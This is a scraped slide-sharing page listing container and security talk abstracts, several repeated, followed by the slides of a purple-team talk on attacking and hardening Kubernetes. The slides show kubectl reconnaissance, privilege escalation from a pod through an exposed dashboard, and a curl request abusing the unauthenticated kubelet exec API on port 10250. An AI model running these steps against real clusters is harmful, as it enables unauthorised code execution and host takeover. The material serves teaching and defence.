This talks' focus lays on a popular containerization tool called Kubernetes. Common implementations of Kubernetes are not secure by default and a lot of information about hardening is not known to the public. Since version 1.7 the security level has increased and common security misconfigurations have been mitigated. During this talk it will be demonstrated what happens if these mitigations are not applied and how to abuse them. The talk will be about both securing and attacking the platform and could be considered a 'purple team' talk. Multiple live demos are planned, most of them ending in a guest-to-host escape and a root shell.
DCSF19 Tips and Tricks of the Docker Captains Docker, Inc.
Brandon Mitchell, BoxBoat
Docker Captain Brandon Mitchell will help you accelerate your adoption of Docker containers by delivering tips and tricks on getting the most out of Docker. Topics include managing disk usage, preventing subnet collisions, debugging container networking, understanding image layers, getting more value out of the default volume driver, and solving the UID/GID permission issues with volumes in a way that allows images to be portable from any developer laptop and to production.
It is a simple introduction to the containers world, starting from LXC to arrive to the Docker Platform.
The presentation is focused on the first steps in the docker environment and the scenarious from a developer point of view.
DCSF19 Tips and Tricks of the Docker Captains Docker, Inc.
Brandon Mitchell, BoxBoat
Docker Captain Brandon Mitchell will help you accelerate your adoption of Docker containers by delivering tips and tricks on getting the most out of Docker. Topics include managing disk usage, preventing subnet collisions, debugging container networking, understanding image layers, getting more value out of the default volume driver, and solving the UID/GID permission issues with volumes in a way that allows images to be portable from any developer laptop and to production.
It is a simple introduction to the containers world, starting from LXC to arrive to the Docker Platform.
The presentation is focused on the first steps in the docker environment and the scenarious from a developer point of view.
While there have been many improvements around securing containers, there is still a large gap in monitoring the behaviour of containers in production. Sysdig Falco is an open source behavioural activity monitor for containerized environments.
Sysdig Falco can detect and alert on anomalous behaviour at the application, file, system, and network level. In this session get a deep dive into Falco: How does behavioural security differ from existing security solutions like image scanning, seccomp, SELinux or AppArmor? What can Sysdig Falco detect? Building and customizing rules for your Docker and Kubernetes apps. Forensics analysis with Sysdig Inspect even when the container doesn't exist anymore!
Read more on:
https://sysdig.com/blog/docker-runtime-security/
https://sysdig.com/blog/runtime-security-kubernetes-sysdig-falco/
From Monolith to Docker Distributed ApplicationsCarlos Sanchez
Docker is revolutionizing the way people think about applications and deployments. It provides a simple way to run and distribute Linux containers for a variety of use cases, from lightweight virtual machines to complex distributed micro-services architectures.
Containers allow to run services in isolation with a minimum performance penalty, increased speed, easier configuration and less complexity, making it ideal for continuous integration and continuous delivery based workloads. But migrating an existing application to a distributed microservices architecture is no easy task, requiring a shift in the software development, networking and storage to accommodate the new architecture.
We will provide insight on our experience creating a Jenkins platform based on distributed Docker containers running on Apache Mesos and Marathon, applicable for all types of applications, but specially Java and JVM based nones.
Deploying Windows Containers on Windows Server 2016Ben Hall
Introduction into the new Windows Containers and Windows Hyper-V Containers coming in Windows Server 2016.
Presented at WinOps Meetup #5 on Wednesday 20th April 2016. http://www.meetup.com/WinOps/events/229065341/
Vagrant is a well-known tool for creating development environments in a simple and consistent way. Since we adopted in our organization we experienced several benefits: lower project setup times, better shared knowledge among team members, less wtf moments ;-)
In this session I'd like to share our experience, including but not limited to:
- advanced vagrantfile configuration
- vm configuration tips for dev environment: performance, debug, tuning
- our wtf moments
- puphet/phansilbe: hot or not?
- tips for sharing a box
Continuous Integration: SaaS vs Jenkins in CloudIdeato
Dopo la diffusione del Cloud Computing e di Docker, è ancora preferibile
adottare i classici SaaS di Continuous Integration rispetto ad un
sistema Jenkins in cloud?
L'intervento ha l’obiettivo di mostrare un caso d'uso applicato in
Ideato di migrazione da un SaaS quale Travis ad un sistema Jenkins in
cloud, sfruttando funzionalità di on demand tramite il cloud di Amazon
Web Services e di containerizzazione tramite Docker.
Tenendo in considerazione gli aspetti tecnici legati all’implementazione
e quelli che potrebbero impattare sul fronte economico come la mancanza
di automatizzazione e i tempi di setup, verranno mostrati pregi e
difetti di questo sistema e come può essere applicato ad una serie di
progetti. Infine verranno elencati una serie di prodotti recentemente
rilasciati e in grado di far evolvere ulteriormente l'attuale sistema.
Code testing and Continuous Integration are just the first step in a source code to production process. Combined with infrastructure-as-code tools such as Puppet the whole process can be automated, and tested!
Running High Performance and Fault Tolerant Elasticsearch Clusters on DockerSematext Group, Inc.
Sematext engineer Rafal Kuc (@kucrafal) walks through the details of running high-performance, fault tolerant Elasticsearch clusters on Docker. Topics include: Containers vs. Virtual Machines, running the official Elasticsearch container, container constraints, good network practices, dealing with storage, data-only Docker volumes, scaling, time-based data, multiple tiers and tenants, indexing with and without routing, querying with and without routing, routing vs. no routing, and monitoring. Talk was delivered at DevOps Days Warsaw 2015.
kubernetes install and practice
* Environment (bare metal installation, not using cloud service)
- VM 1 : Mater node, 30GB, 2 vCPU, 4GB Mem
- VM 2 : Worker node, 30GB, 2 vCPU, 4GB Mem
* Practice
- deploying pod, make a deployment and service
- expose service using ingress(nginx-ingress)
How to create a multi tenancy for an interactive data analysis with jupyter h...Tiago Simões
With this presentation you should be able to create an architecture for a framework of an interactive data analysis by using a Cloudera Spark Cluster with Kerberos, a Jupyter machine with JupyterHub and authentication via LDAP.
CI and CD at Scale: Scaling Jenkins with Docker and Apache MesosCarlos Sanchez
In this presentation Carlos Sanchez will share his experience running Jenkins at scale, using Docker and Apache Mesos to create one of the biggest (if not the biggest) Jenkins clusters to date.
By taking advantage of Apache Mesos, the Jenkins platform is dynamically scaled to run jobs across hundreds of Jenkins masters, on Docker containers distributed across the Mesos cluster. Jenkins slaves are dynamically created based on load, using the Jenkins Mesos and Docker plugins, running in containers distributed across multiple hosts, and isolating job execution.
This presentation will allow a better understanding of Apache Mesos and the challenges of running Docker containerized and distributed applications, particularly JVM ones, by sharing a real world use case, including good and bad decisions and how they affected the development.
Build Your Own CaaS (Container as a Service)HungWei Chiu
In this slide, I introduce the kubernetes and show an example what is CaaS and what it can provides.
Besides, I also introduce how to setup a continuous integration and continuous deployment for the CaaS platform.
While there have been many improvements around securing containers, there is still a large gap in monitoring the behaviour of containers in production. Sysdig Falco is an open source behavioural activity monitor for containerized environments.
Sysdig Falco can detect and alert on anomalous behaviour at the application, file, system, and network level. In this session get a deep dive into Falco: How does behavioural security differ from existing security solutions like image scanning, seccomp, SELinux or AppArmor? What can Sysdig Falco detect? Building and customizing rules for your Docker and Kubernetes apps. Forensics analysis with Sysdig Inspect even when the container doesn't exist anymore!
Read more on:
https://sysdig.com/blog/docker-runtime-security/
https://sysdig.com/blog/runtime-security-kubernetes-sysdig-falco/
From Monolith to Docker Distributed ApplicationsCarlos Sanchez
Docker is revolutionizing the way people think about applications and deployments. It provides a simple way to run and distribute Linux containers for a variety of use cases, from lightweight virtual machines to complex distributed micro-services architectures.
Containers allow to run services in isolation with a minimum performance penalty, increased speed, easier configuration and less complexity, making it ideal for continuous integration and continuous delivery based workloads. But migrating an existing application to a distributed microservices architecture is no easy task, requiring a shift in the software development, networking and storage to accommodate the new architecture.
We will provide insight on our experience creating a Jenkins platform based on distributed Docker containers running on Apache Mesos and Marathon, applicable for all types of applications, but specially Java and JVM based nones.
Deploying Windows Containers on Windows Server 2016Ben Hall
Introduction into the new Windows Containers and Windows Hyper-V Containers coming in Windows Server 2016.
Presented at WinOps Meetup #5 on Wednesday 20th April 2016. http://www.meetup.com/WinOps/events/229065341/
Vagrant is a well-known tool for creating development environments in a simple and consistent way. Since we adopted in our organization we experienced several benefits: lower project setup times, better shared knowledge among team members, less wtf moments ;-)
In this session I'd like to share our experience, including but not limited to:
- advanced vagrantfile configuration
- vm configuration tips for dev environment: performance, debug, tuning
- our wtf moments
- puphet/phansilbe: hot or not?
- tips for sharing a box
Continuous Integration: SaaS vs Jenkins in CloudIdeato
Dopo la diffusione del Cloud Computing e di Docker, è ancora preferibile
adottare i classici SaaS di Continuous Integration rispetto ad un
sistema Jenkins in cloud?
L'intervento ha l’obiettivo di mostrare un caso d'uso applicato in
Ideato di migrazione da un SaaS quale Travis ad un sistema Jenkins in
cloud, sfruttando funzionalità di on demand tramite il cloud di Amazon
Web Services e di containerizzazione tramite Docker.
Tenendo in considerazione gli aspetti tecnici legati all’implementazione
e quelli che potrebbero impattare sul fronte economico come la mancanza
di automatizzazione e i tempi di setup, verranno mostrati pregi e
difetti di questo sistema e come può essere applicato ad una serie di
progetti. Infine verranno elencati una serie di prodotti recentemente
rilasciati e in grado di far evolvere ulteriormente l'attuale sistema.
Code testing and Continuous Integration are just the first step in a source code to production process. Combined with infrastructure-as-code tools such as Puppet the whole process can be automated, and tested!
Running High Performance and Fault Tolerant Elasticsearch Clusters on DockerSematext Group, Inc.
Sematext engineer Rafal Kuc (@kucrafal) walks through the details of running high-performance, fault tolerant Elasticsearch clusters on Docker. Topics include: Containers vs. Virtual Machines, running the official Elasticsearch container, container constraints, good network practices, dealing with storage, data-only Docker volumes, scaling, time-based data, multiple tiers and tenants, indexing with and without routing, querying with and without routing, routing vs. no routing, and monitoring. Talk was delivered at DevOps Days Warsaw 2015.
kubernetes install and practice
* Environment (bare metal installation, not using cloud service)
- VM 1 : Mater node, 30GB, 2 vCPU, 4GB Mem
- VM 2 : Worker node, 30GB, 2 vCPU, 4GB Mem
* Practice
- deploying pod, make a deployment and service
- expose service using ingress(nginx-ingress)
How to create a multi tenancy for an interactive data analysis with jupyter h...Tiago Simões
With this presentation you should be able to create an architecture for a framework of an interactive data analysis by using a Cloudera Spark Cluster with Kerberos, a Jupyter machine with JupyterHub and authentication via LDAP.
CI and CD at Scale: Scaling Jenkins with Docker and Apache MesosCarlos Sanchez
In this presentation Carlos Sanchez will share his experience running Jenkins at scale, using Docker and Apache Mesos to create one of the biggest (if not the biggest) Jenkins clusters to date.
By taking advantage of Apache Mesos, the Jenkins platform is dynamically scaled to run jobs across hundreds of Jenkins masters, on Docker containers distributed across the Mesos cluster. Jenkins slaves are dynamically created based on load, using the Jenkins Mesos and Docker plugins, running in containers distributed across multiple hosts, and isolating job execution.
This presentation will allow a better understanding of Apache Mesos and the challenges of running Docker containerized and distributed applications, particularly JVM ones, by sharing a real world use case, including good and bad decisions and how they affected the development.
Build Your Own CaaS (Container as a Service)HungWei Chiu
In this slide, I introduce the kubernetes and show an example what is CaaS and what it can provides.
Besides, I also introduce how to setup a continuous integration and continuous deployment for the CaaS platform.
About docker cluster management tools
1. Base concepts of cluster
management and docker
2. Docker Swarm
3. Amazon EC2 Container Service
4. Kubernetes
5. Mesosphere
The perl on most linux distros is a mess. Docker makes it easier to build and packge a local perl and applications. Problem is that Docker's manuals produce a mess of their own.
Distributing perl on top of Gentoo's stage3 distro, busybox, or nothing at all made good alternatives. This talk includes basics of setting up docker, building a local perl for it, and packaging perl or applications into images for use in containers.
This talk will focus on a brief overview of Kubernetes, with a brief demo, and then more of an in-depth focus on issues we've faced moving PHP projects into Docker and Kubernetes like signal propagation, init systems, and logging.
Talk from Cape Town PHP meetup on Feb. 7, 2016:
https://www.meetup.com/Cape-Town-PHP-Group/events/237226310/
Code: https://github.com/zoidbergwill/kubernetes-php-examples
Slides as markdown: http://www.zoidbergwill.com/presentations/2017/kubernetes-php/index.md
Rooting Out Root: User namespaces in DockerPhil Estes
This talk on the progress to bring user namespace support into Docker was presented by Phil Estes at LinuxCon/ContainerCon 2015 on Wednesday, Aug. 19th, 2015
Get hands-on with security features and best practices to protect your containerized services. Learn to push and verify signed images with Docker Content Trust, and collaborate with delegation roles. Intermediate to advanced level Docker experience recommended, participants will be building and pushing with Docker during the workshop.
Led By Docker Security Experts:
Riyaz Faizullabhoy
David Lawrence
Viktor Stanchev
Experience Level: Intermediate to advanced level Docker experience recommended
Zsombor Kovács - Cheaters for Everything from Minesweeper to Mobile Banking ...hacktivity
In my opinion, cheating acceptable - it merely means expanding the frame of an application to the point, which is beyond what the creators of the application have ever imagined. In this talk, we explore how the popular instumentalisation framework Frida can be used to hack applications from games to mobile banking applications.
Balázs Bucsay - XFLTReaT: Building a Tunnelhacktivity
XFLTReaT is an open-source tunnelling framework that handles all the boring stuff and offers the capability to the users to take care of only those things that matter. It provides significant improvements over existing tools. From now on there is no need to write a new tunnel for each and every protocol or to deal with interfaces and routing. Any protocol can be converted to a module, which works in a plug-and-play fashion; authentication and encryption can be configured and customised on all traffic and it is also worth mentioning that the framework was designed to be easy to configure, use and develop. In case there is a need to send packets over ICMP, RDP or SSH then this can be done in a matter of minutes, instead of developing a new tool from scratch. The potential use (or abuse) cases are plentiful, such as bypassing network restrictions of an ISP, the proxy of a workplace or obtaining Internet connectivity through bypassing captive portals in the middle of the Atlantic Ocean or at an altitude of 12km on an airplane.
This framework is not just a tool; it unites different technologies in the field of tunnelling. It will be show how to tunnel data over a Windows jumpbox utilising RDP (including the dirty low level "secrets") or how to exfiltrate data over ICMP from barely secured networks. We have simplified the whole process and created a framework that is responsible for everything but the communication itself, we rethought the old way of tunnelling and tried to give something new to the community. After the initial setup the framework takes care of everything. With the check functionality we can even find out, which module can be used on the network, there is no need for any low-level packet fu and hassle. I guarantee that you won’t be disappointed with the tool and the talk, actually you will be richer with an open-source tool.
Mikhail Egorov - Hunting for bugs in Adobe Experience Manager webappshacktivity
Adobe Experience Manager (AEM) is an enterprise-grade CMS. It’s used by high-profile companies like Linkedin, Apple, Mastercard, Western Union, Cisco, General Motors, and others. AEM is built on top of the Apache Sling, Apache Felix and Apache Jackrabbit Oak projects. In the talk, the author will share unique methodology on how to approach AEM weabpps in pentests or bug bounty programs. Misconfiguration issues, as well as product vulnerabilities, will be covered in the talk, including newly discovered vulnerabilities for which Adobe PSIRT assigned CVE ids. The author will share automation tool for discovering vulnerabilities and misconfigurations discussed in the talk.
Gabrial Cirlig & Stefan Tanase - Smart Car Forensics and Vehicle Weaponizationhacktivity
As “smart” is becoming the new standard for everything, malicious threat actors are quick to capitalize on the insecurity of IoT devices. Hackers compromising your network and spying on you is not something new in the world of personal computers, but definitely an emerging threat in the world of personal cars.
Csongor Tamás - Examples of Locality Sensitive Hashing & their Usage for Malw...hacktivity
Several tools has been proposed for malware classification and similarity detection of binary malware samples, however none of them can solve all issues. In my presentation, I'll cover the problematics of Locality Sensitive Hashes and provide some experimental information about the comparison of different LSH algorithms. SSDEEPS's base algorithm, spamsum was originally designed for spam email detection. Although it discoveres some similarity between binaries, it basically needs large equal pieces of the byte code. This only happens rarely and can easily be altered. One of the contenders, TLSH (TrendMicro Locality Sensitive Hash) is a more stable similarity matching process. I'm going to present the results of the comparison on a smaller size samples set (~30k samples). Using LSHs is easy and doesn't require huge computational resources so after the process was deemed useful and effective it was extended to a large malware database of multiple hundreds of terabytes of samples. The experiments focus on ransomware sample classification, so I'm also going to present some details related to hunting for fresh unknown malware samples of known groups.
Matthias Deeg - Bypassing an Enterprise-Grade Biometric Face Authentication S...hacktivity
Biometric authentication systems have long, checkered history in IT security and are regarded as a highly controversial technology. Many manufacturers and users love them because of their usability and the personal touch they give to human-computer interaction when it comes to an often annoying but necessary task like user authentication. Other people hate them because of data privacy and security concerns. Despite all the controversy, biometric authentication systems are still here and they seem to stay.
In fall 2017, SySS GmbH started a research project concerning the enterprise-grade face authentication system Microsoft Windows Hello Face Authentication based on near infrared technology.
In our talk, we will present the results of our research project concerning the enterprise-grade face authentication system Windows Hello Face Authentication by Microsoft based on near infrared and visible light and will demonstrate how different versions of it can be bypassed by rather simple means.
Gergely Biczók - Interdependent Privacy & the Psychology of Likeshacktivity
The Facebook/Cambridge Analytica case headlined technical news the whole Spring of 2018. This case is not the first (and certainly not the last) that demonstrates privacy issues with Facebook and the ecosystem around it; yet, it gained notoriety because of its scale and alleged direct effect on the outcome of the US presidential election. In this talk we look behind the scenes and under the hood and analyze the IT, economic, psychological and legal background necessary to understand the full impact of the Cambridge Analytica case. We touch upon the underlying economic theory on externalities that defines interdependent privacy and sets the scene at a high level; the permission system of the Facebook API that enabled the collection of personal data at scale; the breakthrough psychology research that enabled the use of these data to influence political elections; and the legal impact through the lens of the GDPR.
Paolo Stagno - A Drone Tale: All Your Drones Belong To Ushacktivity
In 2013, DJI Drones quickly gained the reputation as the most stable platform for use in aerial photography and other fields. Since then Drones have increased their field of application and are actively used across various industries (law enforcement and first responders, utility companies, governments and universities) to perform critical operations on daily basis. As a result of that, Drones security has also become a hot topic in the industry.
This talk will provide a comprehensive overview of the security model and security issues affecting the underlying technologies, including existing vulnerabilities in the radio signals, Wi-Fi, Chipset, FPV system, GPS, App and SDK. As part of the presentation, we will discuss the architecture of one of the most famous and popular consumer drone product: the DJI Phantom 3. This model will be used to demonstrate each aspect of discovered security vulnerabilities, together with recommendations and mitigations.
A special focus will be on the recent changes and countermeasures DJI has applied to the firmware of its products in order to harden the security, following the recent accusations and the US Army ban. While the topic of hacking drones by faking GPS signals has been shared before at major security conferences in the past, this talk will extend these aspects to include geo-fencing and no fly zones abuses.
Jack S (linkcabin) - Becoming The Quiz Master: Thanks RE.hacktivity
linkcabin aims to discuss the journey of reverse engineering a pub quiz machine, to a point of emulation. By reverse engineering the software, lessons have been learnt in implementation of security, limits in 'security by obscurity' software solutions and how complex actual machines which involve betting are. After reverse engineering parts of the machine, and coming from a threat intelligence background, it becomes clear how similar software and malware developers minds really are for functionality.
While still developing software for an archaic operating system, much like critical infrastructure around the world, it becomes hard to balance both security and functionality.
Zoltán Balázs - Ethereum Smart Contract Hacking Explained like I’m Fivehacktivity
Mining. Ethereum. Smart Contracts. Gas. Solidity. DAO. These words had no or a different meaning 5 years ago. But now these are the foundations of something exciting and powerful. But with great power comes great responsibility. Designing and implementing Smart Contracts are like encryption protocols. Everyone can come up with one which looks secure from the developer’s perspective, but only a few can design and implement one which is really safe.
But how can one hack Smart Contracts? In order to understand this, I will explain the meaning of all of these words in the Ethereum world from the ground-ups with real life analogies. Once the basic building blocks are explained, I will guide you into the world of hacking Smart Contracts. After attending this presentation, everyone will understand how a recursive call can burn 250M USD on the DAO and how developers can create a parallel universe where this never happened. Reinit? Multi-signature wallets? The Parity hack? All of this is simple once the basics are founded.
Warning: case studies from recent real-life hacks and live interaction with Smart Contracts are included. And Cryptokitties. Meow.
Key Trends Shaping the Future of Infrastructure.pdfCheryl Hung
Keynote at DIGIT West Expo, Glasgow on 29 May 2024.
Cheryl Hung, ochery.com
Sr Director, Infrastructure Ecosystem, Arm.
The key trends across hardware, cloud and open-source; exploring how these areas are likely to mature and develop over the short and long-term, and then considering how organisations can position themselves to adapt and thrive.
Transcript: Selling digital books in 2024: Insights from industry leaders - T...BookNet Canada
The publishing industry has been selling digital audiobooks and ebooks for over a decade and has found its groove. What’s changed? What has stayed the same? Where do we go from here? Join a group of leading sales peers from across the industry for a conversation about the lessons learned since the popularization of digital books, best practices, digital book supply chain management, and more.
Link to video recording: https://bnctechforum.ca/sessions/selling-digital-books-in-2024-insights-from-industry-leaders/
Presented by BookNet Canada on May 28, 2024, with support from the Department of Canadian Heritage.
DevOps and Testing slides at DASA ConnectKari Kakkonen
My and Rik Marselis slides at 30.5.2024 DASA Connect conference. We discuss about what is testing, then what is agile testing and finally what is Testing in DevOps. Finally we had lovely workshop with the participants trying to find out different ways to think about quality and testing in different parts of the DevOps infinity loop.
Epistemic Interaction - tuning interfaces to provide information for AI supportAlan Dix
Paper presented at SYNERGY workshop at AVI 2024, Genoa, Italy. 3rd June 2024
https://alandix.com/academic/papers/synergy2024-epistemic/
As machine learning integrates deeper into human-computer interactions, the concept of epistemic interaction emerges, aiming to refine these interactions to enhance system adaptability. This approach encourages minor, intentional adjustments in user behaviour to enrich the data available for system learning. This paper introduces epistemic interaction within the context of human-system communication, illustrating how deliberate interaction design can improve system understanding and adaptation. Through concrete examples, we demonstrate the potential of epistemic interaction to significantly advance human-computer interaction by leveraging intuitive human communication strategies to inform system design and functionality, offering a novel pathway for enriching user-system engagements.
Accelerate your Kubernetes clusters with Varnish CachingThijs Feryn
A presentation about the usage and availability of Varnish on Kubernetes. This talk explores the capabilities of Varnish caching and shows how to use the Varnish Helm chart to deploy it to Kubernetes.
This presentation was delivered at K8SUG Singapore. See https://feryn.eu/presentations/accelerate-your-kubernetes-clusters-with-varnish-caching-k8sug-singapore-28-2024 for more details.
Connector Corner: Automate dynamic content and events by pushing a buttonDianaGray10
Here is something new! In our next Connector Corner webinar, we will demonstrate how you can use a single workflow to:
Create a campaign using Mailchimp with merge tags/fields
Send an interactive Slack channel message (using buttons)
Have the message received by managers and peers along with a test email for review
But there’s more:
In a second workflow supporting the same use case, you’ll see:
Your campaign sent to target colleagues for approval
If the “Approve” button is clicked, a Jira/Zendesk ticket is created for the marketing design team
But—if the “Reject” button is pushed, colleagues will be alerted via Slack message
Join us to learn more about this new, human-in-the-loop capability, brought to you by Integration Service connectors.
And...
Speakers:
Akshay Agnihotri, Product Manager
Charlie Greenberg, Host
Kubernetes & AI - Beauty and the Beast !?! @KCD Istanbul 2024Tobias Schneck
As AI technology is pushing into IT I was wondering myself, as an “infrastructure container kubernetes guy”, how get this fancy AI technology get managed from an infrastructure operational view? Is it possible to apply our lovely cloud native principals as well? What benefit’s both technologies could bring to each other?
Let me take this questions and provide you a short journey through existing deployment models and use cases for AI software. On practical examples, we discuss what cloud/on-premise strategy we may need for applying it to our own infrastructure to get it to work from an enterprise perspective. I want to give an overview about infrastructure requirements and technologies, what could be beneficial or limiting your AI use cases in an enterprise environment. An interactive Demo will give you some insides, what approaches I got already working for real.
Securing your Kubernetes cluster_ a step-by-step guide to success !KatiaHIMEUR1
Today, after several years of existence, an extremely active community and an ultra-dynamic ecosystem, Kubernetes has established itself as the de facto standard in container orchestration. Thanks to a wide range of managed services, it has never been so easy to set up a ready-to-use Kubernetes cluster.
However, this ease of use means that the subject of security in Kubernetes is often left for later, or even neglected. This exposes companies to significant risks.
In this talk, I'll show you step-by-step how to secure your Kubernetes cluster for greater peace of mind and reliability.
UiPath Test Automation using UiPath Test Suite series, part 3DianaGray10
Welcome to UiPath Test Automation using UiPath Test Suite series part 3. In this session, we will cover desktop automation along with UI automation.
Topics covered:
UI automation Introduction,
UI automation Sample
Desktop automation flow
Pradeep Chinnala, Senior Consultant Automation Developer @WonderBotz and UiPath MVP
Deepak Rai, Automation Practice Lead, Boundaryless Group and UiPath MVP
The Art of the Pitch: WordPress Relationships and SalesLaura Byrne
Clients don’t know what they don’t know. What web solutions are right for them? How does WordPress come into the picture? How do you make sure you understand scope and timeline? What do you do if sometime changes?
All these questions and more will be explored as we talk about matching clients’ needs with what your agency offers without pulling teeth or pulling your hair out. Practical tips, and strategies for successful relationship building that leads to closing the deal.
Generating a custom Ruby SDK for your web service or Rails API using Smithyg2nightmarescribd
Have you ever wanted a Ruby client API to communicate with your web service? Smithy is a protocol-agnostic language for defining services and SDKs. Smithy Ruby is an implementation of Smithy that generates a Ruby SDK using a Smithy model. In this talk, we will explore Smithy and Smithy Ruby to learn how to generate custom feature-rich SDKs that can communicate with any web service, such as a Rails JSON API.
2. whoami
works for KPN in the CERT team
infoSec / hacking enthusiast
attacker gone defender
<3 binary stuff
2 / 42
3. ls -l
what is kubernetes?
how to interact with kubernetes
common pitfalls
some dem0z
advice
3 / 42
4. /bin/kubernetes -h
open source container orchestration
written in go
uses docker
released by Google on 07/06/2014
July 2015 Kubernetes is part of Cloud Native
Computing Foundation
4 / 42
6. kubectl get namespaces
namespaces determine scope
administrative boundaries
resource restrictions
access control
$ kubectl get ns
NAME STATUS AGE
default Active 23d
kube-public Active 23d
kube-system Active 23d
safe-space Active 2h
6 / 42
7. kubectl get pods
kubernetes works with pods
a pod is a collection of one or more containers
configuration in yaml
images are freely available
pods are job based
$ kubectl get pods --namespace=kube-system
NAME READY
calico-etcd-rswwr 1/1
calico-kube-controllers-84fd4db7cd-twxh7 1/1
calico-node-mmpqm 2/2
coredns-78fcdf6894-th6ws 1/1
coredns-78fcdf6894-wrrzl 1/1
etcd-super-secure-k82 1/1
kube-apiserver-super-secure-k82 1/1
kube-controller-manager-super-secure-k82 1/1
kube-proxy-jcm7n 1/1
kube-scheduler-super-secure-k82 1/1
kubernetes-dashboard-6948bdb78-4kg5c 1/1
7 / 42
9. kubectl exec
executing commands on pods
opening a shell on nepal:
$ kubectl exec nepal -i --tty --namespace=countries -- /bin/bash
root@nepal:/# ls
bin dev home lib64 mnt proc run srv tmp var
boot etc lib media opt root sbin sys usr
root@nepal:/#
-i is interactive
--tty set STDIN as TTY
9 / 42
10. kubectl get svc
another abstraction layer
clusterIP proxy services
loadbalances / exposes services from pods
$ kubectl get svc --all-namespaces
NAMESPACE NAME TYPE CLUSTER-IP
default kubernetes ClusterIP 10.96.0.1
kube-system calico-etcd ClusterIP 10.96.232.136
kube-system kube-dns ClusterIP 10.96.0.10
kube-system kubernetes-dashboard ClusterIP 10.102.156.98
countries nepal NodePort 10.108.209.230
10 / 42
11. kubectl get secrets
Object to hold sensitive information
Created automatically for API access
$ kubectl get secrets --all-namespaces
NAMESPACE NAME
default default-token-h2rnd
kube-public default-token-zwtkt
kube-system attachdetach-controller-token-nsvgz
kube-system bootstrap-signer-token-6w725
[...SNIP...]
kube-system token-cleaner-token-dqww6
kube-system ttl-controller-token-7fd48
countries default-token-xgjmm
countries supersecret-token-token-8qrlc
11 / 42
25. privileged mode
> Processes within the container get almost the
same privileges that are available to processes
outside a container.
Great, right?
25 / 42
26. Example 2
accessible kubernetes-dashboard
version < 1.7 full admin priv by default
>= 1.7 minimal privileges granted, admin revoked
website displays steps for enabling admin (not
recommended)
26 / 42
27. inside
pod
do
privesc
$ ./kubectl get po --namespace=safe-space
NAME READY STATUS RESTARTS AGE
container2 1/1 Running 0 8m
running in safe space
$ ./kubectl --namespace=safe-space create -f
escape.yml
Error from server (Forbidden): error when creating
"escape.yml" pods is forbidden:
User "system:serviceaccount:safe-space:default"
cannot create pods in the namespace "safe-space"
$ ./kubectl --namespace=default create -f escape.yml
Error from server (Forbidden): error when creating
"escape.yml" pods is forbidden:
User "system:serviceaccount:safe-space:default"
cannot create pods in the namespace "default"
oh noes, no privesc?
27 / 42
28. inside
pod
do
privesc
recon...
$ ./kubectl get svc --namespace=kube-system
NAME CLUSTER-IP PORT(S)
calico-etcd 10.96.232.136 6666/TCP
kube-dns 10.96.0.10 53/UDP,53/TCP
kubernetes-dashboard 10.97.154.242 443/TCP
^ that dashboard looks interesting
28 / 42
29. inside
pod
do
privesc
recon...
$ ./kubectl get svc --namespace=kube-system
NAME CLUSTER-IP PORT(S)
calico-etcd 10.96.232.136 6666/TCP
kube-dns 10.96.0.10 53/UDP,53/TCP
kubernetes-dashboard 10.97.154.242 443/TCP
$ curl -v https://10.97.154.242 -k
[...SSL_STUFFZ...]
> GET / HTTP/1.1
> User-Agent: curl/7.35.0
> Host: 10.97.154.242
> Accept: */*
>
< HTTP/1.1 200 OK
< Accept-Ranges: bytes
< Cache-Control: no-store
< Content-Length: 990
< Content-Type: text/html; charset=utf-8
< Last-Modified: Tue, 13 Feb 2018 11:17:03 GMT
< Date: Mon, 21 May 2018 08:59:25 GMT
<
<!doctype html> <html ng-app="kubernetesDashboard">
[...SNIP...]
yay! access to dashboardz
29 / 42
30. DEMO 2
access to pod in countries
attempt privesc
pwn host?
30 / 42
31. Example 3
port 10250 exposed
before 09/02/2018 exposed kubelet API
allowed unauthenticated code execution
now authenticated by default
readonly port 10255 still unauthenticated
$ curl --insecure -v -H "X-Stream-Protocol-Version: v2.channel.k8s.io"
-H "X-Stream-Protocol-Version: channel.k8s.io"
-X POST "https://kube-node-here:10250/exec/<namespace>/<podname>/
<container-name>
?command=touch&command=hello_world
&input=1&output=1&tty=1"
https://medium.com/handy-tech/analysis-of-a-kubernetes-hack-backdooring-through-
kubelet-823be5c3d67c
31 / 42
38. harden
network
harden
node
limit service exposure
limit user access (SSH pubkey)
disable privileged mode (if possible)
setup proper logging
do not auto-mount service account
credentials
use latest version of Kubernetes
run kube-bench / kubesec
https://github.com/aquasecurity/kube-bench
https://kubesec.io/
38 / 42
39. harden
network
harden
node
harden
pods
do not run as root by default
set pod security context
disable privesc (yes, this is an
option)
set DenyEscalatingExec on privileged
pods
set AllowPrivilegeEscalation to False
check containers for vulnerable
software
https://github.com/ahmetb/kubernetes-network-policy-recipes
39 / 42
![Securing Attacking
Kubernetes
[_evict @ KPN-CERT]
1 / 42](https://image.slidesharecdn.com/vincent-181204133615/85/Vincent-Ruijter-Securing-Attacking-Kubernetes-1-320.jpg)
